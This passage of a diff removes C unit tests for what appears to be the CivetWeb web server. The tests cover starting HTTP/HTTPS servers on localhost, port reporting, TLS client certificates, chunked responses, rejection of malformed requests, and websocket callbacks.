-	(void)system("cmd /c copy C:\\OpenSSL-Win32\\ssleay32.dll ssleay32.dll");
-#endif
-#endif
-}
-END_TEST
-
-
-static void *threading_data = 0;
-
-static void *
-test_thread_func_t(void *param)
-{
-	ck_assert_ptr_eq(param, &threading_data);
-	ck_assert_ptr_eq(threading_data, NULL);
-	threading_data = &threading_data;
-	return NULL;
-}
-
-
-START_TEST(test_threading)
-{
-	int ok;
-
-	threading_data = NULL;
-	mark_point();
-
-	ok = mg_start_thread(test_thread_func_t, &threading_data);
-	ck_assert_int_eq(ok, 0);
-
-	wait_not_null(&threading_data);
-	ck_assert_ptr_eq(threading_data, &threading_data);
-}
-END_TEST
-
-
-static int
-log_msg_func(const struct mg_connection *conn, const char *message)
-{
-	struct mg_context *ctx;
-	char *ud;
-
-	ck_assert(conn != NULL);
-	ctx = mg_get_context(conn);
-	ck_assert(ctx != NULL);
-	ud = (char *)mg_get_user_data(ctx);
-
-	strncpy(ud, message, 255);
-	ud[255] = 0;
-	mark_point();
-
-	printf("LOG_MSG_FUNC: %s\n", message);
-	mark_point();
-
-	return 1; /* Return 1 means "already handled" */
-}
-
-
-static int
-test_log_message(const struct mg_connection *conn, const char *message)
-{
-	(void)conn;
-
-	printf("LOG_MESSAGE: %s\n", message);
-	mark_point();
-
-	return 0; /* Return 0 means "not yet handled" */
-}
-
-
-static struct mg_context *
-test_mg_start(const struct mg_callbacks *callbacks,
-              void *user_data,
-              const char **configuration_options)
-{
-	struct mg_context *ctx;
-	struct mg_callbacks cb;
-
-	if (callbacks) {
-		memcpy(&cb, callbacks, sizeof(cb));
-	} else {
-		memset(&cb, 0, sizeof(cb));
-	}
-
-	if (cb.log_message == NULL) {
-		cb.log_message = test_log_message;
-	}
-
-	mark_point();
-	test_sleep(SLEEP_BEFORE_MG_START);
-	mark_point();
-	ctx = mg_start(&cb, user_data, configuration_options);
-	mark_point();
-	if (ctx) {
-		/* Give the server some time to start in the test VM */
-		/* Don't need to do this if mg_start failed */
-		test_sleep(SLEEP_AFTER_MG_START);
-	}
-	mark_point();
-
-	return ctx;
-}
-
-
-static void
-test_mg_stop(struct mg_context *ctx)
-{
-#ifdef __MACH__
-	/* For unknown reasons, there are sporadic hands
-	 * for OSX if mark_point is called here */
-	test_sleep(SLEEP_BEFORE_MG_STOP);
-	mg_stop(ctx);
-	test_sleep(SLEEP_AFTER_MG_STOP);
-#else
-	mark_point();
-	test_sleep(SLEEP_BEFORE_MG_STOP);
-	mark_point();
-	mg_stop(ctx);
-	mark_point();
-	test_sleep(SLEEP_AFTER_MG_STOP);
-	mark_point();
-#endif
-}
-
-
-static void
-test_mg_start_stop_http_server_impl(int ipv6)
-{
-	struct mg_context *ctx;
-	const char *OPTIONS[16];
-	int optcnt = 0;
-	const char *localhost_name = ((ipv6) ? "[::1]" : "127.0.0.1");
-
-#if defined(MG_LEGACY_INTERFACE)
-	size_t ports_cnt;
-	int ports[16];
-	int ssl[16];
-#endif
-	struct mg_callbacks callbacks;
-	char errmsg[256];
-
-	struct mg_connection *client_conn;
-	char client_err[256];
-	const struct mg_request_info *client_ri;
-	int client_res, ret;
-	struct mg_server_ports portinfo[8];
-
-	mark_point();
-
-#if !defined(NO_FILES)
-	OPTIONS[optcnt++] = "document_root";
-	OPTIONS[optcnt++] = ".";
-#endif
-	OPTIONS[optcnt++] = "listening_ports";
-	OPTIONS[optcnt++] = ((ipv6) ? "+8080" : "8080");
-	OPTIONS[optcnt] = 0;
-
-#if defined(MG_LEGACY_INTERFACE)
-	memset(ports, 0, sizeof(ports));
-	memset(ssl, 0, sizeof(ssl));
-#endif
-	memset(portinfo, 0, sizeof(portinfo));
-	memset(&callbacks, 0, sizeof(callbacks));
-	memset(errmsg, 0, sizeof(errmsg));
-
-	callbacks.log_message = log_msg_func;
-
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-#if defined(MG_LEGACY_INTERFACE)
-	ports_cnt = mg_get_ports(ctx, 16, ports, ssl);
-	ck_assert_uint_eq(ports_cnt, 1);
-	ck_assert_int_eq(ports[0], 8080);
-	ck_assert_int_eq(ssl[0], 0);
-	ck_assert_int_eq(ports[1], 0);
-	ck_assert_int_eq(ssl[1], 0);
-#endif
-
-	ret = mg_get_server_ports(ctx, 0, portinfo);
-	ck_assert_int_lt(ret, 0);
-	ck_assert_int_eq(portinfo[0].protocol, 0);
-	ck_assert_int_eq(portinfo[0].port, 0);
-	ck_assert_int_eq(portinfo[0].is_ssl, 0);
-	ck_assert_int_eq(portinfo[0].is_redirect, 0);
-	ck_assert_int_eq(portinfo[1].protocol, 0);
-	ck_assert_int_eq(portinfo[1].port, 0);
-	ck_assert_int_eq(portinfo[1].is_ssl, 0);
-	ck_assert_int_eq(portinfo[1].is_redirect, 0);
-
-	ret = mg_get_server_ports(ctx, 4, portinfo);
-	ck_assert_int_eq(ret, 1);
-	if (ipv6) {
-		ck_assert_int_eq(portinfo[0].protocol, 3);
-	} else {
-		ck_assert_int_eq(portinfo[0].protocol, 1);
-	}
-	ck_assert_int_eq(portinfo[0].port, 8080);
-	ck_assert_int_eq(portinfo[0].is_ssl, 0);
-	ck_assert_int_eq(portinfo[0].is_redirect, 0);
-	ck_assert_int_eq(portinfo[1].protocol, 0);
-	ck_assert_int_eq(portinfo[1].port, 0);
-	ck_assert_int_eq(portinfo[1].is_ssl, 0);
-	ck_assert_int_eq(portinfo[1].is_redirect, 0);
-
-	test_sleep(1);
-
-	/* HTTP 1.0 GET request */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn = mg_connect_client(
-	    localhost_name, 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(client_ri->local_uri, "404");
-#else
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	/* TODO: ck_assert_str_eq(client_ri->request_method, "HTTP/1.0"); */
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-#endif
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* HTTP 1.1 GET request */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn = mg_connect_client(
-	    localhost_name, 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.1\r\n");
-	mg_printf(client_conn, "Host: localhost:8080\r\n");
-	mg_printf(client_conn, "Connection: close\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(client_ri->local_uri, "404");
-#else
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	/* TODO: ck_assert_str_eq(client_ri->request_method, "HTTP/1.0"); */
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-#endif
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-
-	/* HTTP 1.7 GET request - this HTTP version does not exist  */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn = mg_connect_client(
-	    localhost_name, 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.7\r\n");
-	mg_printf(client_conn, "Host: localhost:8080\r\n");
-	mg_printf(client_conn, "Connection: close\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	/* Response must be 505 HTTP Version not supported */
-	ck_assert_str_eq(client_ri->local_uri, "505");
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-
-	/* HTTP request with multiline header.
-	 * Multiline header are obsolete with RFC 7230 section-3.2.4
-	 * and must return "400 Bad Request" */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn = mg_connect_client(
-	    localhost_name, 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.1\r\n");
-	mg_printf(client_conn, "Host: localhost:8080\r\n");
-	mg_printf(client_conn, "X-Obsolete-Header: something\r\nfor nothing\r\n");
-	mg_printf(client_conn, "Connection: close\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	/* Response must be 400 Bad Request */
-	ck_assert_str_eq(client_ri->local_uri, "400");
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	/* End test */
-	test_mg_stop(ctx);
-	mark_point();
-}
-
-
-START_TEST(test_mg_start_stop_http_server)
-{
-	mark_point();
-	test_mg_start_stop_http_server_impl(0);
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_mg_start_stop_http_server_ipv6)
-{
-	mark_point();
-#if defined(USE_IPV6)
-	test_mg_start_stop_http_server_impl(1);
-#endif
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_mg_start_stop_https_server)
-{
-#ifndef NO_SSL
-
-	struct mg_context *ctx;
-
-#if defined(MG_LEGACY_INTERFACE)
-	size_t ports_cnt;
-	int ports[16];
-	int ssl[16];
-#endif
-	struct mg_callbacks callbacks;
-	char errmsg[256];
-
-	const char *OPTIONS[8]; /* initializer list here is rejected by CI test */
-	int opt_idx = 0;
-	const char *ssl_cert = locate_ssl_cert();
-
-	struct mg_connection *client_conn;
-	char client_err[256];
-	const struct mg_request_info *client_ri;
-	int client_res, ret;
-	struct mg_server_ports portinfo[8];
-
-	ck_assert(ssl_cert != NULL);
-
-	memset((void *)OPTIONS, 0, sizeof(OPTIONS));
-#if !defined(NO_FILES)
-	OPTIONS[opt_idx++] = "document_root";
-	OPTIONS[opt_idx++] = ".";
-#endif
-	OPTIONS[opt_idx++] = "listening_ports";
-	OPTIONS[opt_idx++] = "8080r,8443s";
-	OPTIONS[opt_idx++] = "ssl_certificate";
-	OPTIONS[opt_idx++] = ssl_cert;
-
-	ck_assert_int_le(opt_idx, (int)(sizeof(OPTIONS) / sizeof(OPTIONS[0])));
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 1] == NULL);
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 2] == NULL);
-
-#if defined(MG_LEGACY_INTERFACE)
-	memset(ports, 0, sizeof(ports));
-	memset(ssl, 0, sizeof(ssl));
-#endif
-	memset(portinfo, 0, sizeof(portinfo));
-	memset(&callbacks, 0, sizeof(callbacks));
-	memset(errmsg, 0, sizeof(errmsg));
-
-	callbacks.log_message = log_msg_func;
-
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-#if defined(MG_LEGACY_INTERFACE)
-	ports_cnt = mg_get_ports(ctx, 16, ports, ssl);
-	ck_assert_uint_eq(ports_cnt, 2);
-	ck_assert_int_eq(ports[0], 8080);
-	ck_assert_int_eq(ssl[0], 0);
-	ck_assert_int_eq(ports[1], 8443);
-	ck_assert_int_eq(ssl[1], 1);
-	ck_assert_int_eq(ports[2], 0);
-	ck_assert_int_eq(ssl[2], 0);
-#endif
-
-	ret = mg_get_server_ports(ctx, 0, portinfo);
-	ck_assert_int_lt(ret, 0);
-	ck_assert_int_eq(portinfo[0].protocol, 0);
-	ck_assert_int_eq(portinfo[0].port, 0);
-	ck_assert_int_eq(portinfo[0].is_ssl, 0);
-	ck_assert_int_eq(portinfo[0].is_redirect, 0);
-	ck_assert_int_eq(portinfo[1].protocol, 0);
-	ck_assert_int_eq(portinfo[1].port, 0);
-	ck_assert_int_eq(portinfo[1].is_ssl, 0);
-	ck_assert_int_eq(portinfo[1].is_redirect, 0);
-
-	ret = mg_get_server_ports(ctx, 4, portinfo);
-	ck_assert_int_eq(ret, 2);
-	ck_assert_int_eq(portinfo[0].protocol, 1);
-	ck_assert_int_eq(portinfo[0].port, 8080);
-	ck_assert_int_eq(portinfo[0].is_ssl, 0);
-	ck_assert_int_eq(portinfo[0].is_redirect, 1);
-	ck_assert_int_eq(portinfo[1].protocol, 1);
-	ck_assert_int_eq(portinfo[1].port, 8443);
-	ck_assert_int_eq(portinfo[1].is_ssl, 1);
-	ck_assert_int_eq(portinfo[1].is_redirect, 0);
-	ck_assert_int_eq(portinfo[2].protocol, 0);
-	ck_assert_int_eq(portinfo[2].port, 0);
-	ck_assert_int_eq(portinfo[2].is_ssl, 0);
-	ck_assert_int_eq(portinfo[2].is_redirect, 0);
-
-	test_sleep(1);
-
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8443, 1, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(client_ri->local_uri, "404");
-#else
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	/* TODO: ck_assert_str_eq(client_ri->request_method, "HTTP/1.0"); */
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-#endif
-	mg_close_connection(client_conn);
-
-	test_sleep(1);
-
-	test_mg_stop(ctx);
-	mark_point();
-#endif
-}
-END_TEST
-
-
-START_TEST(test_mg_server_and_client_tls)
-{
-#ifndef NO_SSL
-
-	struct mg_context *ctx;
-
-	int ports_cnt;
-	struct mg_server_ports ports[16];
-	struct mg_callbacks callbacks;
-	char errmsg[256];
-
-	struct mg_connection *client_conn;
-	char client_err[256];
-	const struct mg_request_info *client_ri;
-	int client_res;
-	struct mg_client_options client_options;
-
-	const char *OPTIONS[32]; /* initializer list here is rejected by CI test */
-	int opt_idx = 0;
-	char server_cert[256];
-	char client_cert[256];
-	const char *res_dir = locate_resources();
-
-	ck_assert(res_dir != NULL);
-	strcpy(server_cert, res_dir);
-	strcpy(client_cert, res_dir);
-#ifdef _WIN32
-	strcat(server_cert, "cert\\server.pem");
-	strcat(client_cert, "cert\\client.pem");
-#else
-	strcat(server_cert, "cert/server.pem");
-	strcat(client_cert, "cert/client.pem");
-#endif
-
-	memset((void *)OPTIONS, 0, sizeof(OPTIONS));
-#if !defined(NO_FILES)
-	OPTIONS[opt_idx++] = "document_root";
-	OPTIONS[opt_idx++] = ".";
-#endif
-	OPTIONS[opt_idx++] = "listening_ports";
-	OPTIONS[opt_idx++] = "8080r,8443s";
-	OPTIONS[opt_idx++] = "ssl_certificate";
-	OPTIONS[opt_idx++] = server_cert;
-	OPTIONS[opt_idx++] = "ssl_verify_peer";
-	OPTIONS[opt_idx++] = "yes";
-	OPTIONS[opt_idx++] = "ssl_ca_file";
-	OPTIONS[opt_idx++] = client_cert;
-
-	ck_assert_int_le(opt_idx, (int)(sizeof(OPTIONS) / sizeof(OPTIONS[0])));
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 1] == NULL);
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 2] == NULL);
-
-	memset(ports, 0, sizeof(ports));
-	memset(&callbacks, 0, sizeof(callbacks));
-	memset(errmsg, 0, sizeof(errmsg));
-
-	callbacks.log_message = log_msg_func;
-
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-	ports_cnt = mg_get_server_ports(ctx, 16, ports);
-	ck_assert_int_eq(ports_cnt, 2);
-	ck_assert_int_eq(ports[0].protocol, 1);
-	ck_assert_int_eq(ports[0].port, 8080);
-	ck_assert_int_eq(ports[0].is_ssl, 0);
-	ck_assert_int_eq(ports[0].is_redirect, 1);
-	ck_assert_int_eq(ports[1].protocol, 1);
-	ck_assert_int_eq(ports[1].port, 8443);
-	ck_assert_int_eq(ports[1].is_ssl, 1);
-	ck_assert_int_eq(ports[1].is_redirect, 0);
-	ck_assert_int_eq(ports[2].protocol, 0);
-	ck_assert_int_eq(ports[2].port, 0);
-	ck_assert_int_eq(ports[2].is_ssl, 0);
-	ck_assert_int_eq(ports[2].is_redirect, 0);
-
-	test_sleep(1);
-
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8443, 1, client_err, sizeof(client_err));
-
-	ck_assert_str_ne(client_err, "");
-	ck_assert(client_conn == NULL);
-
-	memset(client_err, 0, sizeof(client_err));
-	memset(&client_options, 0, sizeof(client_options));
-	client_options.host = "127.0.0.1";
-	client_options.port = 8443;
-	client_options.client_cert = client_cert;
-	client_options.server_cert = server_cert;
-
-	client_conn = mg_connect_client_secure(&client_options,
-	                                       client_err,
-	                                       sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET / HTTP/1.0\r\n\r\n");
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-#if defined(NO_FILES)
-	ck_assert_str_eq(client_ri->local_uri, "404");
-#else
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	/* TODO: ck_assert_str_eq(client_ri->request_method, "HTTP/1.0"); */
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
-	ck_assert_int_gt(client_res, 0);
-	ck_assert_int_le(client_res, sizeof(client_err));
-#endif
-	mg_close_connection(client_conn);
-
-	/* TODO: A client API using a client certificate is missing */
-
-	test_sleep(1);
-
-	test_mg_stop(ctx);
-#endif
-	mark_point();
-}
-END_TEST
-
-
-static struct mg_context *g_ctx;
-
-static int
-request_test_handler(struct mg_connection *conn, void *cbdata)
-{
-	int i;
-	char chunk_data[32];
-	const struct mg_request_info *ri;
-	struct mg_context *ctx;
-	void *ud, *cud;
-	void *dummy = malloc(1);
-
-	ctx = mg_get_context(conn);
-	ud = mg_get_user_data(ctx);
-	ri = mg_get_request_info(conn);
-
-	ck_assert(ri != NULL);
-	ck_assert(ctx == g_ctx);
-	ck_assert(ud == &g_ctx);
-
-	ck_assert(dummy != NULL);
-
-	mg_set_user_connection_data(conn, (void *)&dummy);
-	cud = mg_get_user_connection_data(conn);
-	ck_assert_ptr_eq((void *)cud, (void *)&dummy);
-
-	mg_set_user_connection_data(conn, (void *)NULL);
-	cud = mg_get_user_connection_data(conn);
-	ck_assert_ptr_eq((void *)cud, (void *)NULL);
-
-	free(dummy);
-
-	ck_assert_ptr_eq((void *)cbdata, (void *)(ptrdiff_t)7);
-	strcpy(chunk_data, "123456789A123456789B123456789C");
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Transfer-Encoding: chunked\r\n"
-	          "Content-Type: text/plain\r\n\r\n");
-
-	for (i = 1; i <= 10; i++) {
-		mg_printf(conn, "%x\r\n", i);
-		mg_write(conn, chunk_data, (unsigned)i);
-		mg_printf(conn, "\r\n");
-	}
-
-	mg_printf(conn, "0\r\n\r\n");
-	mark_point();
-
-	return 1;
-}
-
-
-#ifdef USE_WEBSOCKET
-/****************************************************************************/
-/* WEBSOCKET SERVER                                                         */
-/****************************************************************************/
-static const char *websocket_welcome_msg = "websocket welcome\n";
-static const size_t websocket_welcome_msg_len =
-    18 /* strlen(websocket_welcome_msg) */;
-static const char *websocket_goodbye_msg = "websocket bye\n";
-static const size_t websocket_goodbye_msg_len =
-    14 /* strlen(websocket_goodbye_msg) */;
-
-
-#if defined(DEBUG)
-static void
-WS_TEST_TRACE(const char *f, ...)
-{
-	va_list l;
-	va_start(l, f);
-	vprintf(f, l);
-	va_end(l);
-}
-#else
-#define WS_TEST_TRACE(...)
-#endif
-
-
-static int
-websock_server_connect(const struct mg_connection *conn, void *udata)
-{
-	(void)conn;
-
-	ck_assert_ptr_eq((void *)udata, (void *)(ptrdiff_t)7531);
-	WS_TEST_TRACE("Server: Websocket connected\n");
-	mark_point();
-
-	return 0; /* return 0 to accept every connection */
-}
-
-
-static void
-websock_server_ready(struct mg_connection *conn, void *udata)
-{
-	ck_assert_ptr_eq((void *)udata, (void *)(ptrdiff_t)7531);
-	ck_assert_ptr_ne((void *)conn, (void *)NULL);
-	WS_TEST_TRACE("Server: Websocket ready\n");
-
-	/* Send websocket welcome message */
-	mg_lock_connection(conn);
-	mg_websocket_write(conn,
-	                   WEBSOCKET_OPCODE_TEXT,
-	                   websocket_welcome_msg,
-	                   websocket_welcome_msg_len);
-	mg_unlock_connection(conn);
-
-	WS_TEST_TRACE("Server: Websocket ready X\n");
-	mark_point();
-}
-
-
-#define long_ws_buf_len_16 (500)
-#define long_ws_buf_len_64 (70000)
-static char long_ws_buf[long_ws_buf_len_64];
-
-
-static int
-websock_server_data(struct mg_connection *conn,
-                    int bits,
-                    char *data,
-                    size_t data_len,
-                    void *udata)
-{
-	(void)bits;
-
-	ck_assert_ptr_eq((void *)udata, (void *)(ptrdiff_t)7531);
-	WS_TEST_TRACE("Server: Got %u bytes from the client\n", (unsigned)data_len);
-
-	if (data_len == 3 && !memcmp(data, "bye", 3)) {
-		/* Send websocket goodbye message */
-		mg_lock_connection(conn);
-		mg_websocket_write(conn,
-		                   WEBSOCKET_OPCODE_TEXT,
-		                   websocket_goodbye_msg,
-		                   websocket_goodbye_msg_len);
-		mg_unlock_connection(conn);
-	} else if (data_len == 5 && !memcmp(data, "data1", 5)) {
-		mg_lock_connection(conn);
-		mg_websocket_write(conn, WEBSOCKET_OPCODE_TEXT, "ok1", 3);
-		mg_unlock_connection(conn);
-	} else if (data_len == 5 && !memcmp(data, "data2", 5)) {
-		mg_lock_connection(conn);
-		mg_websocket_write(conn, WEBSOCKET_OPCODE_TEXT, "ok 2", 4);
-		mg_unlock_connection(conn);
-	} else if (data_len == 5 && !memcmp(data, "data3", 5)) {
-		mg_lock_connection(conn);
-		mg_websocket_write(conn, WEBSOCKET_OPCODE_TEXT, "ok - 3", 6);
-		mg_unlock_connection(conn);
-	} else if (data_len == long_ws_buf_len_16) {
-		ck_assert(memcmp(data, long_ws_buf, long_ws_buf_len_16) == 0);
-		mg_lock_connection(conn);
-		mg_websocket_write(conn,
-		                   WEBSOCKET_OPCODE_BINARY,
-		                   long_ws_buf,
-		                   long_ws_buf_len_16);
-		mg_unlock_connection(conn);
-	} else if (data_len == long_ws_buf_len_64) {
-		ck_assert(memcmp(data, long_ws_buf, long_ws_buf_len_64) == 0);
-		mg_lock_connection(conn);
-		mg_websocket_write(conn,
-		                   WEBSOCKET_OPCODE_BINARY,
-		                   long_ws_buf,
-		                   long_ws_buf_len_64);
-		mg_unlock_connection(conn);
-	} else {
-
-#if defined(__MINGW32__) || defined(__GNUC__)
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunreachable-code"
-#endif
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunreachable-code"
-#endif
-
-		ck_abort_msg("Got unexpected message from websocket client");
-
-
-		return 0;
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-#if defined(__MINGW32__) || defined(__GNUC__)
-#pragma GCC diagnostic pop
-#endif
-	}
-	mark_point();
-
-	return 1; /* return 1 to keep the connetion open */
-}
-
-
-static void
-websock_server_close(const struct mg_connection *conn, void *udata)
-{
-#ifndef __MACH__
-	ck_assert_ptr_eq((void *)udata, (void *)(ptrdiff_t)7531);
-	WS_TEST_TRACE("Server: Close connection\n");
-
-	/* Can not send a websocket goodbye message here -
-	 * the connection is already closed */
-
-	mark_point();
-#endif
-
-	(void)conn;
-	(void)udata;
-}
-
-
-/****************************************************************************/
-/* WEBSOCKET CLIENT                                                         */
-/****************************************************************************/
-struct tclient_data {
-	void *data;
-	size_t len;
-	int closed;
-	int clientId;
-};
-
-
-static int
-websocket_client_data_handler(struct mg_connection *conn,
-                              int flags,
-                              char *data,
-                              size_t data_len,
-                              void *user_data)
-{
-	struct mg_context *ctx = mg_get_context(conn);
-	struct tclient_data *pclient_data =
-	    (struct tclient_data *)mg_get_user_data(ctx);
-
-	ck_assert_ptr_eq(user_data, (void *)pclient_data);
-
-	ck_assert(pclient_data != NULL);
-	ck_assert_int_gt(flags, 128);
-	ck_assert_int_lt(flags, 128 + 16);
-	ck_assert((flags == (int)(128 | WEBSOCKET_OPCODE_BINARY))
-	          || (flags == (int)(128 | WEBSOCKET_OPCODE_TEXT)));
-
-	if (flags == (int)(128 | WEBSOCKET_OPCODE_TEXT)) {
-		WS_TEST_TRACE(
-		    "Client %i received %lu bytes text data from server: %.*s\n",
-		    pclient_data->clientId,
-		    (unsigned long)data_len,
-		    (int)data_len,
-		    data);
-	} else {
-		WS_TEST_TRACE("Client %i received %lu bytes binary data from\n",
-		              pclient_data->clientId,
-		              (unsigned long)data_len);
-	}
-
-	pclient_data->data = malloc(data_len);
-	ck_assert(pclient_data->data != NULL);
-	memcpy(pclient_data->data, data, data_len);
-	pclient_data->len = data_len;
-
-	mark_point();
-
-	return 1;
-}
-
-
-static void
-websocket_client_close_handler(const struct mg_connection *conn,
-                               void *user_data)
-{
-	struct mg_context *ctx = mg_get_context(conn);
-	struct tclient_data *pclient_data =
-	    (struct tclient_data *)mg_get_user_data(ctx);
-
-#ifndef __MACH__
-	ck_assert_ptr_eq(user_data, (void *)pclient_data);
-
-	ck_assert(pclient_data != NULL);
-
-	WS_TEST_TRACE("Client %i: Close handler\n", pclient_data->clientId);
-	pclient_data->closed++;
-
-	mark_point();
-#else
-
-	(void)user_data;
-	pclient_data->closed++;
-
-#endif /* __MACH__ */
-}
-
-#endif /* USE_WEBSOCKET */
-
-
-START_TEST(test_request_handlers)
-{
-	char ebuf[100];
-	struct mg_context *ctx;
-	struct mg_connection *client_conn;
-	const struct mg_request_info *ri;
-	char uri[64];
-	char buf[1 + 2 + 3 + 4 + 5 + 6 + 7 + 8 + 9 + 10 + 8];
-	const char *expected =
-	    "112123123412345123456123456712345678123456789123456789A";
-	int i;
-	const char *request = "GET /U7 HTTP/1.0\r\n\r\n";
-#if defined(USE_IPV6) && defined(NO_SSL)
-	const char *HTTP_PORT = "8084,[::]:8086";
-	short ipv4_port = 8084;
-	short ipv6_port = 8086;
-#elif !defined(USE_IPV6) && defined(NO_SSL)
-	const char *HTTP_PORT = "8084";
-	short ipv4_port = 8084;
-#elif defined(USE_IPV6) && !defined(NO_SSL)
-	const char *HTTP_PORT = "8084,[::]:8086,8194r,[::]:8196r,8094s,[::]:8096s";
-	short ipv4_port = 8084;
-	short ipv4s_port = 8094;
-	short ipv4r_port = 8194;
-	short ipv6_port = 8086;
-	short ipv6s_port = 8096;
-	short ipv6r_port = 8196;
-#elif !defined(USE_IPV6) && !defined(NO_SSL)
-	const char *HTTP_PORT = "8084,8194r,8094s";
-	short ipv4_port = 8084;
-	short ipv4s_port = 8094;
-	short ipv4r_port = 8194;
-#endif
-
-	const char *OPTIONS[16];
-	const char *opt;
-	FILE *f;
-	const char *plain_file_content;
-	const char *encoded_file_content;
-	const char *cgi_script_content;
-	const char *expected_cgi_result;
-	int opt_idx = 0;
-	struct stat st;
-
-#if !defined(NO_SSL)
-	const char *ssl_cert = locate_ssl_cert();
-#endif
-
-#if defined(USE_WEBSOCKET)
-	struct tclient_data ws_client1_data = {NULL, 0, 0, 1};
-	struct tclient_data ws_client2_data = {NULL, 0, 0, 2};
-	struct tclient_data ws_client3_data = {NULL, 0, 0, 3};
-	struct tclient_data ws_client4_data = {NULL, 0, 0, 4};
-	struct mg_connection *ws_client1_conn = NULL;
-	struct mg_connection *ws_client2_conn = NULL;
-	struct mg_connection *ws_client3_conn = NULL;
-	struct mg_connection *ws_client4_conn = NULL;
-#endif
-
-	char cmd_buf[256];
-	char *cgi_env_opt;
-
-	mark_point();
-
-	memset((void *)OPTIONS, 0, sizeof(OPTIONS));
-	OPTIONS[opt_idx++] = "listening_ports";
-	OPTIONS[opt_idx++] = HTTP_PORT;
-	OPTIONS[opt_idx++] = "authentication_domain";
-	OPTIONS[opt_idx++] = "test.domain";
-#if !defined(NO_FILES)
-	OPTIONS[opt_idx++] = "document_root";
-	OPTIONS[opt_idx++] = ".";
-#endif
-#ifndef NO_SSL
-	ck_assert(ssl_cert != NULL);
-	OPTIONS[opt_idx++] = "ssl_certificate";
